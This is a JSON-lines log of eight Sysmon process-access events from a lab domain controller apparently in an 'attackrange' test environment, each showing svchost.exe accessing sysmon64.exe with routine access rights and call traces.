{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4721,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4722,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4723,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4724,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4725,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4726,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4727,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4728,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
